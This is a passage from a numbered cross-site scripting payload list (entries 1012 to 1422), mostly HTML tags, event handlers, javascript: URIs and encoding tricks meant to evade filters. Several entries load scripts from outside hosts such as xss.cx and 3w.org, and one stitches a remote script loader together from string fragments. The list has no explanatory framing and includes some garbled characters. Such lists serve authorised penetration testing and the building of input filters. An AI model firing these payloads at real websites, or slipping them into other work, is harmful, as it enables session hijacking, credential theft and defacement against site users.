  1012. base64 alert(2) = data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
  1013. <base href=//0>
  1014. <base href=data:/,0/><script src=alert(1)></script>
  1015. <base href=data:/,alert(1)/><script src=”jquery.js”></script>
  1016. <base href=”/\evil”>
  1017. <base href=javascript:/0/><iframe src=,alert(1)></iframe>
  1018. <base href=”javascript:\”> <a href=”//%00confirm(2);//”>XSS</a>
  1019. <base href=”javascript:\”> <a href=”//%0a%0dconfirm(2);//”>XSS</a>
  1020. <base href=”javascript:\”> <a href=”//%0aalert(/1/);//”>link</a>
  1021. <base href=”javascript:\”> <a href=”//%0aconfirm(2);//”>XSS</a>
  1022. <base href=”javascript:/”><a href=”**/alert(1)”><base href=”javascript:/”><a href=”**/alert(1)”>
  1023. <base href=”javascript:\”> <a href=”//xss.cx/xss.js”>XSS</a>
  1024. <base+href=”javascript:alert(1);//”>
  1025. <BASE href=”javascript:alert(‘X8SS’);//”>
  1026. <;BASE HREF=”;javascript:alert(‘;XSS’;);//”;>;
  1027. <BASE HREF=”javascript:alert(‘XSS’);//”>
  1028. <BASE HREF=”javascript:alert(‘XSS’);//”>
  1029. <BASE HREF=”javascript:alert(XSS);//”>
  1030. <BASE HREF=”javascript:confirm(‘XSS’);//”>
  1031. <base HREF=”javascript:document.vulnerable=true;//”>
  1032. <BASE HREF=”javascript:javascript:alert(1);//”>
  1033. <base/href=j&#x041va&#83cript&#x3a&#x2f>
  1034. ?base=javascript:alert(0)”,
  1035. <base target=”<script>alert(1)</script>”><a href=”javascript:name”>CLICK</a>
  1036. ?baseurl=asfunction:getURL,javascript:alert(1)//”,
  1037. <b class=”ng-include:’//evil’’”>
  1038. %BCscript%BEalert(%A21%A2)%BC/script%BE
  1039. %BCscript%BEalert(%A2XSS%A2)%BC/script%BE
  1040. begin=”0s” dur=”0.1s” fill=”freeze”/>
  1041. <BGSOUND id=XSS SRC=”javascript:alert(‘XSS’);”>
  1042. <bgsound onPropertyChange bgsound onPropertyChange=”javascript:javascript:alert(1)”></bgsound onPropertyChange>
  1043. <bgsound+src=”javascript:alert(1);”>
  1044. <BGSOUND src=”javascript:alert(‘XjSS’);”>
  1045. <;BGSOUND SRC=”;javascript:alert(‘;XSS’;);”;>;
  1046. <BGSOUND SRC=”javascript:alert(‘XSS’);”>
  1047. <BGSOUND SRC=”javascript:alert(‘XSS’);”
  1048. <BGSOUND SRC=”javascript:alert(XSS);”>
  1049. <BGSOUND SRC=”javascript:alert(‘XSS’);”>
  1050. <BGSOUND SRC=”javascript:confirm(‘XSS’);”>
  1051. <bgsound src=”javascript:document.vulnerable=true;”>
  1052. <bgsound SRC=”javascript:document.vulnerable=true;”>
  1053. <BGSOUND SRC=”javascript:javascript:alert(1);”>
  1054. <blah style=”blah:expression(alert(1))” />
  1055. <blink/ onmouseover=pr&#x6F;mpt(1)>OnMouseOver {Firefox & Opera}
  1056. [<blockquote cite=”]”>[“ onmouseover=”alert(‘RVRSH3LL_XSS’);” ]
  1057. <b><noscript><a src=’x’ style=’x:\3c\2fnoscript\3e\3ciframe/onload\3d alert(1)\3e’>
  1058. </body>
  1059. <BoDy%0AOnpaGeshoW=%2bwindow.prompt(1)
  1060. body.appendChild(createElement(‘script’)).src=’//DOMAIN’
  1061. <BODY BACKGROUND=”javascript:alert(‘XeSS’)”>
  1062. <;BODY BACKGROUND=”;javascript:alert(‘;XSS’;);”;>;
  1063. <BODY BACKGROUND=”javascript:alert(‘XSS’);”>
  1064. <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
  1065. <BODY BACKGROUND=”javascript:alert(XSS)”>
  1066. <BODY BACKGROUND=javascript:alert(XSS)>
  1067. <body background=javascript:alert(/xss/)></body>
  1068. <BODY BACKGROUND=”javascript:confirm(‘XSS’)”>
  1069. <body BACKGROUND=”javascript:document.vulnerable=true;”>
  1070. <body background=javascript:’”><script>alert(navigator.userAgent)</script>></body>
  1071. <body background=javascript:’”><script>alert(navigator.userAgent)</script>></body>
  1072. <body background=javascript:’”><script>alert(XSS)</script>></body>
  1073. body{background:url(JavAs cr ipt:alert(0))}
  1074. body{background:url(“javascript:alert(‘xss’)”)}
  1075. <body <body onload=;;;;;al:eval(‘al’+’ert(1)’);;>
  1076. </BODY></HTML>
  1077. <body id=XSS onscroll=eval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  1078. <body language=vbsonload=alert-1
  1079. <body language=vbs onload=alert-1
  1080. <body language=vbsonload=alert-1
  1081. <body language=vbs onload=alert-1 // IE-8
  1082. <body language=vbs onload=confirm-1
  1083. <body language=vbs onload=window.location=’data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+’>
  1084. “><body language=vbs onload=window.location=’http://xss.cx'>
  1085. <body/onactivate=alert(1)>
  1086. <body/onactivate=URL=name//
  1087. <body onbeforeunload body onbeforeunload=”javascript:javascript:alert(1)”></body onbeforeunload>
  1088. <body onBeforeUnload body onBeforeUnload=”javascript:javascript:alert(1)”></body onBeforeUnload>
  1089. <body onblur body onblur=”javascript:javascript:alert(1)”></body onblur>
  1090. <body onblur=x onload=popup=1;>
  1091. <body onclick=”poc();”>
  1092. <body onerror=popup=1;><svg/onfocus=import>
  1093. <body onfocus=alert(1)>
  1094. <body onfocus=alert(93)>
  1095. <body onfocus body onfocus=”javascript:javascript:alert(1)”></body onfocus>
  1096. <body onFocus body onFocus=”javascript:javascript:alert(1)”></body onFocus>
  1097. <body onfocus=”location=&#039;javascrpt:alert(1)
  1098. <body onfocus=”location=&#039;javascrpt:alert(1) >123
  1099. <body onfocus=”location=’javascrpt:alert(1) >123
  1100. <body onhashchange=alert(1)>
  1101. <body/onhashchange=alert(1)><a href=#>clickit
  1102. <body/onhashchange=alert(1)><a href=#>click me
  1103. <body onhashchange=alert(1)><a href=#x>click this!#x
  1104. <body onhashchange=alert(94)><a href=#x>click this!#x
  1105. <body onhelp=alert(1)>press F1! (MSIE)
  1106. <body onhelp=alert(98)>press F1! (MSIE)
  1107. <body oninput=alert(document.domain)><input autofocus></br>
  1108. <body oninput=javascript:alert(1)><input autofocus>
  1109. <body onkeydown body onkeydown=”javascript:javascript:alert(1)”></body onkeydown>
  1110. <body onkeyup body onkeyup=”javascript:javascript:alert(1)”></body onkeyup>
  1111. <body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;;
  1112. <body onload=a1={x:this.parent.document};a1.x.writeln(1);>
  1113. <body onload=;a2={y:eval};a1={x:a2.y(‘al’+’ert’)};;;;;;;;;_=a1.x;_(1);;;;
  1114. \”><BODY ONLOAD=alert(0x000123)>
  1115. <body onload=;;;;;;;;;;;_=alert;_(1);;;;
  1116. <body onload=alert(1)>
  1117. <body onload=”$})}}}});alert(1);({0:{0:{0:function(){0({“>
  1118. <body/onload=alert(25)>
  1119. <body onload=alert(91)>
  1120. <BODY ONLOAD=alert(‘hellox worldss’)>
  1121. <BODY ONLOAD=alert(iXSSi)>
  1122. <BODY ONLOAD=alert(‘XgSS’)>
  1123. ><body/onload=alert(Xss)>
  1124. ��><body/onload=alert(��Xss��)>
  1125. <body onLoad=”alert(‘XSS’);”
  1126. <body onLoad=”alert(‘XSS’);”
  1127. <;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(“;XSS”;)>;
  1128. <BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert(“XSS”)>
  1129. <BODY onload!#$%&()*~+_.,:;?@[/|\]^`=alert(“XSS”)>
  1130. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
  1131. <BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert(“XSS”)>
  1132. “><BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert(“XSS”)>
  1133. “><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
  1134. “;>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(“;XSS”;)>;
  1135. <;BODY ONLOAD=alert(‘;XSS’;)>;
  1136. <BODY ONLOAD=alert(‘XSS’)>
  1137. <BODY ONLOAD=alert(“XSS”)>
  1138. <BODY ONLOAD=alert(��XSS��)>
  1139. <BODY ONLOAD=alert(XSS)>
  1140. <BODY ONLOAD =alert(‘XSS’)>
  1141. ><body/onload=alert(Xss-By-Muhaddi)>
  1142. <body onload=alert(/XSS/.source)>
  1143. “> <BODY ONLOAD=”a();”><SCRIPT>function a(){alert(‘X12SS’);}</SCRIPT><”
  1144. “> <BODY ONLOAD=”a();”><SCRIPT>function a(){alert(‘XSS’);}</SCRIPT><”
  1145. <body onload body onload=”javascript:javascript:alert(1)”></body onload>
  1146. <body onLoad body onLoad=”javascript:javascript:alert(1)”></body onLoad>
  1147. <BODY ONLOAD=confirm(‘XSS’)>
  1148. <body onload=”document.vulnerable=true;”>
  1149. <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
  1150. <body ONLOAD=document.vulnerable=true;>
  1151. <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
  1152. <BODY ONLOAD=javascript:alert(1)>
  1153. <BODY ONLOAD=javascript:javascript:alert(1)>
  1154. <body/onload=javascript:window.onerror=eval;throw&#039;=alert\x281\x29&#039;;
  1155. <body/onload=javascript:window.onerror=eval;throw’=alert\x281\x29';>
  1156. <body/onload=location=name//
  1157. <body/onload=location=write(top)//
  1158. <body/onload=&lt;! — &gt;&#10alert(1)>
  1159. <body/onload=&lt;! — &gt;&#10alert(1)>
  1160. <body/onload=&lt;! — &gt;&#10confirm(1)>
  1161. <body/onload=&lt;! — &gt;&#10confirm(1);prompt(/XSS/.source)>
  1162. ><body/onload=&lt;! — &gt;&#10confirm(1);prompt(/XSS/.source)>
  1163. “<body/onload=&lt;! — &gt;&#10confirm(1);prompt(/XSS/.source)>”
  1164. “\”><body/onload=&lt;! — &gt;&#10confirm(1);prompt(/XSS/.source)>”,
  1165. <body onload=popup=1;>
  1166. <body onload=```${prompt``}`>
  1167. <body onload=prompt(1);>
  1168. <body/onload=self[/loca/.source%2b/tion/.source]=name//
  1169. <body/onload=this[/loca/.source%2b/tion/.source]=name//
  1170. <body/onload=URL=name//
  1171. <body onload=”’use strict’;throw new class extends Function{}(‘alert(1)’)``”>
  1172. <body onload=’vbs:Set x=CreateObject(“Msxml2.XMLHTTP”):x.open”GET”,”.”:x.send:MsgBox(x.responseText)’>
  1173. <body onLoad=”while(true) alert(‘XSS’);”>
  1174. <body onLoad=”while(true) alert(‘XSS’);”>
  1175. <body/onload=window[/loca/.source%2b/tion/.source]=name//
  1176. <body/����$/onload=x={doc:parent[��document��]};x.doc.writeln(1)
  1177. <body onMouseEnter body onMouseEnter=”javascript:javascript:alert(1)”></body onMouseEnter>
  1178. <body onMouseMove body onMouseMove=”javascript:javascript:alert(1)”></body onMouseMove>
  1179. <body onMouseOver body onMouseOver=”javascript:javascript:alert(1)”></body onMouseOver>
  1180. <body onorientationchange=alert(1)>
  1181. <body onorientationchange=alert(orientation)>
  1182. <body onpagehide body onpagehide=”javascript:javascript:alert(1)”></body onpagehide>
  1183. <body onPageHide body onPageHide=”javascript:javascript:alert(1)”></body onPageHide>
  1184. <body onpageshow=”alert(1)”>
  1185. <body onpageshow=alert(1)>
  1186. <body/onpageshow=alert(1)>
  1187. <body onpageshow=alert(92)>
  1188. <body onPageShow body onPageShow=”javascript:javascript:alert(1)”></body onPageShow>
  1189. <body/onpageshow=confirm()>//
  1190. <body onpageshow=top[‘ale’+’rt’]()>
  1191. <body onPopState body onPopState=”javascript:javascript:alert(1)”></body onPopState>
  1192. <body onPropertyChange body onPropertyChange=”javascript:javascript:alert(1)”></body onPropertyChange>
  1193. <body onresize=alert(1)>
  1194. <body onresize=alert(1)>press F12!
  1195. <body onresize=alert(97)>press F12!
  1196. <body onResize body onResize=”javascript:javascript:alert(1)”></body onResize>
  1197. <body onscroll=alert(1)>
  1198. <body onscroll=alert(1)><br><br><br><br>
  1199. <body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  1200. <body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x
  1201. <body onscroll=alert(26)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  1202. <body onscroll=alert(96)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x
  1203. <body onscroll=alert(XSS)><br><br><br><br><br><br>…<br><br><br><br><input autofocus>
  1204. <body onscroll=javascript:alert(1)><br><br><br><br><br><br>…<br><br><br><br><br><br><br><br><br><br>…<br><br><br><br><br><br><br><br><br><br>…<br><br><br><br><br><br><br><br><br><br>…<br><br><br><br><br><br><br><br><br><br>…<br><br><br><br><input autofocus>
  1205. <body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  1206. <body onunload body onunload=”javascript:javascript:alert(1)”></body onunload>
  1207. <body onUnload body onUnload=”javascript:javascript:alert(1)”></body onUnload>
  1208. <body onunload=”javascript:alert(‘XSS’);”>
  1209. <body rel=’popup=1;’onerror=popup=1; onload=x >
  1210. <body><script>hash=location.hash.slice(1);document.body.innerHTML=decodeURIComponent(hash);</script></body>
  1211. <body><script>hash=location.hash.slice(1);document.write(decodeURIComponent(hash));</script></body>
  1212. <body scroll=confirm(1)><br><br><br><br><br><br>…<br><br><br><br><input autofocus>
  1213. <body/s/onload=x={doc:parent.document};x.doc.writeln(1)
  1214. <body src=1 href=1 onerror=”javascript:alert(1)”></body>
  1215. <body style=”height:1000px” onwheel=”alert(1)”>
  1216. <body style=”height:1000px” onwheel=”[DATA]”>
  1217. <body style=”height:1000px” onwheel=”[JS-F**k Payload]”> <div contextmenu=”xss”>Right-Click Here<menu id=”xss” onshow=”[JS-F**k Payload]”>
  1218. <body style=”height:1000px” onwheel=”prom%25%32%33%25%32%36x70;t(1)”> <div contextmenu=”xss”>Right-Click Here<menu id=”xss” onshow=”prom%25%32%33%25%32%36x70;t(1)”>
  1219. <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
  1220. <body style=overflow:auto;height:1000px onscroll=alert(95) id=x>#x
  1221. <body><svg><x><script>alert(1)</script></x></svg></body>
  1222. <BODY(‘XSS’)>
  1223. body{xss:expression(alert(��Xss��))}
  1224. body{xss:expression(alert(Xss))}
  1225. body{xss:expression(alert(Xss-By-Muhaddi))}
  1226. body{xxx:expression(eval(String.fromCharCode(105,102,40,33,119,105,110,100,111,119,46,120,41,123,97,108,101,114,116,40,39,120,115,115,39,41,59,119,105,110,100,111,119,46,120,61,49,59,125)))}
  1227. <b onbeforescriptexecute=alert(185)>
  1228. <bonbeforescriptexecute=prompt()>
  1229. <b onclick=alert(1)>click me!
  1230. “><b/onclick=”javascript:window.window.window[‘confirm’](1)”>bold
  1231. bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
  1232. <br><br><br><br><br><br><br><br><br><br>
  1233. <br><br><br><br><br><br><x id=x>#x
  1234. <;br size=\”;&;{alert(&#039;XSS&#039;)}\”;>;
  1235. <br size=”&{alert(‘XkSS’)}”>
  1236. <br size=”&{alert(‘XSS’)}”>
  1237. <br size=”&{alert(‘XSS’)}”>
  1238. <br size=\”&{alert(‘XSS’)}\”>
  1239. <;BR SIZE=”;&;{alert(‘;XSS’;)}”;>;
  1240. <BR SIZE=”&{alert(‘XSS’)}”>
  1241. <BR SIZE=”&{alert(XSS)}”> (netspace)
  1242. <BR SIZE=”&{confirm(‘XSS’)}”>
  1243. <br SIZE=”&{document.vulnerable=true}”>
  1244. <BR SIZE=”&{javascript:alert(1)}”>
  1245. <;/br style=a:expression(alert())>;
  1246. </br style=a:expression(alert())>
  1247. </br style=a:expression(alert())>
  1248. </br style=a:expression(alert(1))>
  1249. <brute contenteditable onblur=alert(1)>lose focus!
  1250. <brute contenteditable onfocus=alert(1)>focus this!
  1251. <brute contenteditable oninput=alert(1)>input here!
  1252. <brute contenteditable onkeydown=alert(1)>press any key!
  1253. <brute contenteditable onkeypress=alert(1)>press any key!
  1254. <brute contenteditable onkeyup=alert(1)>press any key!
  1255. <brute contenteditable onpaste=alert(1)>paste here!
  1256. //brutelogic.com.br/tests/status.html&msg=<script>alert(document.domain)
  1257. //brutelogic.com.br/webgun/test.php?p=<body/onhashchange=alert(document.domain)>
  1258. //brutelogic.com.br/webgun/test.php?p=<body/onresize=alert(document.domain)>
  1259. //brutelogic.com.br/webgun/test.php?p=<svg/onload=eval(name)>&name=alert(document.domain)
  1260. <brute onclick=alert(1)>clickme!
  1261. <brute onclick=alert(1)>click this!
  1262. <brute oncontextmenu=alert(1)>right click this!
  1263. <brute oncopy=alert(1)>copy this!
  1264. <brute oncut=alert(1)>copy this!
  1265. <brute ondblclick=alert(1)>double click this!
  1266. <brute ondrag=alert(1)>drag this!
  1267. <brute onmousedown=alert(1)>click this!
  1268. <brute onmousemove=alert(1)>hover this!
  1269. <brute onmouseout=alert(1)>hover this!
  1270. <brute onmouseover=alert(1)>hover this!
  1271. <brute onmouseup=alert(1)>click this!
  1272. <brute style=font-size:500px onmouseover=alert(1)>0000
  1273. <brute style=font-size:500px onmouseover=alert(1)>0001
  1274. <brute style=font-size:500px onmouseover=alert(1)>0002
  1275. <brute style=font-size:500px onmouseover=alert(1)>0003
  1276. <b <script>alert(1)</script>0
  1277. <b <script>alert(1)//</script>0</script></b>
  1278. <b “<script>alert(1)</script>”>hola</b>
  1279. <b><script<b></b><alert(1)</script </b></b>
  1280. <B=”<SCRIPT>confirm(1)</SCRIPT>”>
  1281. <B <SCRIPT>confirm(1)</SCRIPT>>
  1282. b={{set(‘_rootDataHost’,ownerdefaultView)}}
  1283. [?=btoa][?`~)e`][?`OE’2UirU+`.split`1`[-~0]]`$${?`zoD`+”($)”}$``0${btoa(‘|o&|Y’).match(/[h-te]*/)+’(/’+btoa(‘n\x8a-3,’)+’/)’}`
  1284. b=top,a=/loc/ . source,a+=/ation/ . source,b[a=a] = name
  1285. b=\”URL(\\”\”;
  1286. <button autofocus onfocus=confirm(2)>
  1287. <button autofocus=x onchange=’import’onfocus=popup=1; >
  1288. <button data=popup=1; id=’x’onfocus=popup=1; >
  1289. <button form=test onformchange=alert(1)>//INJECTX
  1290. <button form=x>xss<form id=x action=”javas&Tab;cript:alert(1)”//
  1291. <button>’><img src=x onerror=confirm(0);></button>
  1292. “<button>’><img src=x onerror=confirm(0);></button>”
  1293. <button ‘ onclick=alert(1)//>*/alert(1)//
  1294. <button/onclick=alert(20)>M
  1295. <button onclick=popup=1;>
  1296. <button onclick=”window.open(‘http://xss.cx/::Error138 ‘);”>CLICKME
  1297. <button onfocus=alert(1) autofocus>
  1298. <button onmousemove=”javascript:alert(1)”>renwa
  1299. <button><select%20name=xss><option>%26%23x000000003c;script%26%23x000000003e;alert(1)%26%23x000000003c;/script%26%23x000000003e;
  1300. <button><select%20name=xss><option>%26%23x3c;script%26%23x3e;
  1301. buttons.html(button.getAttribute(“data-text”));
  1302. “><button><svg/onload=v=prompt;v(/XSS/.source);v(0)></button>
  1303. $(“button”).val(“<iframe src=vbscript:confirm(1)>”)
  1304. `<b\x20#x (click)=”x.inn\x65rHTML=’\x3ciframe onload=alert(1)\x3e’”>CLICK</b>`
  1305. B+Z+J+W+O;
  1306. c={{}}
  1307. %c0��//(0000%0dconfirm(1)//
  1308. “ = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
  1309. ‘ = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
  1310. < = %C0%BC = %E0%80%BC = %F0%80%80%BC
  1311. %C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
  1312. > = %C0%BE = %E0%80%BE = %F0%80%80%BE
  1313. %c0u003cimg+src%3d1+onerror%3dalert(/xss/)+%c0u003e
  1314. %c1;alert(/xss/);//
  1315. c2=c.getContext(‘2d’);
  1316. c2=c.getContext(2d);
  1317. ? (%c4%b0).toLowerCase() => i
  1318. ? (%c4%b1).toUpperCase() => I
  1319. ? (%c5%bf) .toUpperCase() => S
  1320. ‘ = %CA%B9
  1321. “ = %CA%BA
  1322. %CA%BA>%EF%BC%9Csvg/onload%EF%BC%9Dalert%EF%BC%881)>
  1323. %CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert(1)%EF%BC%9E
  1324. %CA%BA%EF%BC%9E%EF%BC%9Csvg onload %EF%BC%9Dalert%EF%BC%881%EF%BC%89%EF%BC%9E
  1325. ?callback=javascript:alert(1)”,
  1326. callback({“name”:”[0xc0]\u003cimg src=1 onerror=alert(/xss/) [0xc0]\u003e”});
  1327. callback({“name”:”u003cimg src=1 onerror=alert(/xss/) u003e”})
  1328. ?callback=<script/src=?callback=alert(document.domain)//></script>
  1329. <canvas onclick=”popup=1;”>
  1330. Carriage Return Injected##<script%0Daaa>alert(1)</script%0Daaaa>
  1331. \”))}catch(e){alert(1)}//
  1332. \”));}catch(e){confirm(document.domain);}//
  1333. \”));}catch(e){confirm(document.domain)}//
  1334. ;\”))}catch(e) {confirm(document.location);}//
  1335. ;\\”))}catch(e) {confirm(document.location);}//
  1336. \”));}catch(e){x=window.open(‘http://xss.cx/');setTimeout('confirm(x.document.body.innerText)',4000)}//
  1337. //@cc_on-alert(1))
  1338. /*@cc_on-alert(1))
  1339. <![CDATA”:
  1340. <![CDATA[<h1>My HTML content</h1>]]>
  1341. ![CDATA[<! — ]]<script>alert(‘XSS’);// →</script>
  1342. <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(‘XSS’);<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
  1343. <![CDATA[<script>confirm(document.domain)</script>]]>
  1344. <![CDATA[<script>var n=0;while(true){n;}</script>]]>
  1345. <![CDATA[<script>var n=0;while(true){n++;}</script>]]>
  1346. c=d.createElement(‘canvas’);
  1347. c=d.createElement(canvas);
  1348. <center><h1 id=’text’>Click here to XSS!</h1></center>
  1349. charset=utf-
  1350. charset=utf- 32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
  1351. charset=utf-8&v=><img src=x onerror=prompt(0);>
  1352. charset=utf-8&v=��><img src=x onerror=prompt(0);>
  1353. c.height=480;
  1354. Chrome (Any character \x01 to \x20)
  1355. chrome&jsonp=alert(1);
  1356. Chrome: this[Object[“keys”](this)[146]](1)
  1357. ‘`”><*chr*script>log(*num*)</script>
  1358. <cite><a href=”javascript:confirm(1);”>XSS cited!</a></cite>
  1359. c=\”javascript&#058;\”;
  1360. ```${``[class extends[alert``]{}]}```
  1361. [class extends[alert````]{}]
  1362. ,class extends[]/alert(1){}
  1363. !class extends`${alert(1)}```{}
  1364. class extends[]/alert(1){}
  1365. class XSS {public static function main() {flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||”javascript:alert(1)”),flash.Lib._root.name||”_top”);}}
  1366. [Click here](javascript:alert(1))
  1367. ?clickTAG=javascript:alert(1)”,
  1368. ?clickTAG=javascript:alert(1)&TargetAS=”,
  1369. <code onmouseover=a=eval;b=alert;a(b(/g/.source));>HI</code>
  1370. Code Reuse Regular Script
  1371. : = &colon;
  1372. [color=red’ onmouseover=”alert(‘xss’)”]mouse over[/color]
  1373. [color=red’ onmouseover=”alert(‘xss’)”]mouse over[/color]
  1374. [color=red width=expression(alert(123))][color]
  1375. [color=red width=expression(alert(123))][color]
  1376. <command onmouseover=”javascript:confirm(0);”>Save //
  1377. <command onmouseover=”\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x6 9\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B”>Save</command>
  1378. <command onmouseover=”\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x6 9\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B”>Save</command>
  1379. <Command onmouseover=”\ X6A \ x61 \ x76 \ x61 \ x53 \ x43 \ x52 \ x49 \ x50 \ x54 \ x26 \ x63 \ x6F \ x6C \ x6F \ x6E \ x3B \ x63 \ x6F \ x6E \ x6 6 \ x69 \ x72 \ x6D \ x26 \ x6C \ x70 \ x61 \ x72 \ x3B \ x31 \ x26 \ x72 \ x70 \ x61 \ x72 \ x3B “> Save </ command>
  1380. <comment><img src=”</comment><img src=x onerror=alert(1)//”>
  1381. <comment><img src=”</comment><img src=x onerror=alert(1))//”>
  1382. <comment><img src=”</comment><img src=x onerror=alert(/ourren_demo/)//”>
  1383. <comment><img src=”</comment><img src=x onerror=javascript:alert(1))//”>
  1384. Components.lookupMethod(self, ‘alert’)(1)
  1385. Components.lookupMethod(self, ‘confirm’)(1)
  1386. =confirm(1);>”;>
  1387. -confirm(1)-
  1388. ‘-/”/-confirm(1)//’
  1389. ‘-confirm`1`-’
  1390. “-confirm`1`-”
  1391. \’);confirm(1);//
  1392. \”;confirm(1);//
  1393. +confirm(1) — 
  1394. +confirm(1)
  1395. ��;confirm(1)//
  1396. confirm(1)”.replace(/.+/,eval)//
  1397. confirm`1`; var something = `abc${confirm(1)}def`; ``.constructor.constructor`confirm\`1\````;
  1398. confirm(1)>>>/xss
  1399. ‘+confirm(9)&&null==’
  1400. confirm = co\u006efir\u006d
  1401. Confirm = co\u006efir\u006d
  1402. -(confirm)(document.domain)//
  1403. \”;confirm(document.location);//
  1404. confirm(document.location)
  1405. confirm(document.selection.createRange().getBookmark())
  1406. confirm(location.hostname)
  1407. ‘;confirm(String.fromCharCode(88,83,83))//’;confirm(String.fromCharCode(88,83,83))//”;
  1408. confirm(String.fromCharCode(88,83,83))//”;confirm(String.fromCharCode(88,83,83))// — 
  1409. ‘;confirm(String.fromCharCode(88,83,83))//’;confirm(String.fromCharCode(88,83,83))//”;confirm(String.fromCharCode(88,83,83))//”;confirm(String.fromCharCode(88,83,83))// — </SCRIPT>”>’><SCRIPT>confirm(String.fromCharCode(88,83,83))</SCRIPT>
  1410. ‘;confirm(String.fromCharCode(88,83,83))//\’;confirm(String.fromCharCode(88,83,83))//”;confirm(String.fromCharCode(88,83,83))//\”;confirm(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>confirm(String.fromCharCode(88,83,83))</SCRIPT>=&{}
  1411. confirm(window.toStaticHTML(‘<base href=”http://xss.cx/"></base>'));
  1412. confirm(window.toStaticHTML(‘<label style=”overflow:hidden;background:red;display:block;width:4000px;height:4000px;position:absolute;top:0px;left:0px;” for=”submit”>Click’));
  1413. confirm(window.toStaticHTML(‘<marquee>foo</marquee>’));
  1414. “; ||confirm(‘XSS’) || “
  1415. confirm(<xss>xs{[function::status]}s</xss>)
  1416. [][?=’constructor’][?](‘alert(1)’)()
  1417. [].constructor.constructor(‘alert(1)’)()
  1418. [].constructor.constructor(“alert” + “(1)”)()
  1419. [][‘constructor’][‘constructor’](‘alert(1)’)()
  1420. {{constructor.constructor(‘alert(1)’)()}}
  1421. ${‘’.constructor.constructor(‘alert(1)’)()}
  1422. {{constructor.constructor(‘alert(1)’)()}} <div ng-app> {‘a’.constructor.fromCharCode=[].join; ‘a’.constructor[0]=’\u003ciframe onload=alert(/Backdoored/)\u003e’;}} </div> <div ng-app> {{‘a’.constructor.prototype.charAt=[].join; $eval(‘x=alert(1)’)+’’}} </div> <script> onload=function(){document.write(String.fromCharCode(97));}</script> <SCRIPT SRC=http://3w.org/XSS/xss.js> </ SCRIPT> <SCRIPT SRC=http://3w.org/XSS/xss.js> </ SCRIPT> <IMG SRC=javascript:alert(‘XSS’)> <IMG SRC=JaVaScRiPt:alert(‘XSS’)> <IMG SRC=javascript:alert(“XSS”)> <IMG “””> <SCRIPT> Alert (“XSS”) </ SCRIPT> “> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=jav..??..S’)> Unicode encoding ( 9 ) 7 of UTF-8 is no semicolon ( calculator ) <IMG SRC=jav..??..S’)> <IMG SRC=java..??..XSS’)> <IMG SRC=”jav ascript:alert(‘XSS’);”> <IMG SRC=”jav ascript:alert(‘XSS’);”> <IMG SRC = “jav ascript: alert (‘XSS ‘ ) ; “ > <IMG SRC=”jav ascript:alert(‘XSS’);”> <IMG SRC=”javascript:alert(‘XSS’)”> <script> z = ‘document.’ </ script> <script> z = z + ‘write (“‘ </ script> <script> z = z + ‘<script’ </ script> <script> z = z + ‘src = ht’ </ script> <script> z = z + ‘tp :/ / ww’ </ script> <script> z = z + ‘w.zoyzo’ </ script> <script> z = z + ‘. cn / 1.’ </ script> <script> z = z + ‘js> </ sc’ </ script> <script> z = z + ‘ript> “)’ </ script> <script> eval_r (z) </ script> perl-e ‘print “<IMG SRC=javascript:alert(“XSS”)>”;’> out perl-e ‘print “<SCRIPT> alert (“ XSS “) </ SCRIPT>”;’> out <IMG SRC=” javascript:alert(‘XSS’);”> <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js"> </ SCRIPT> 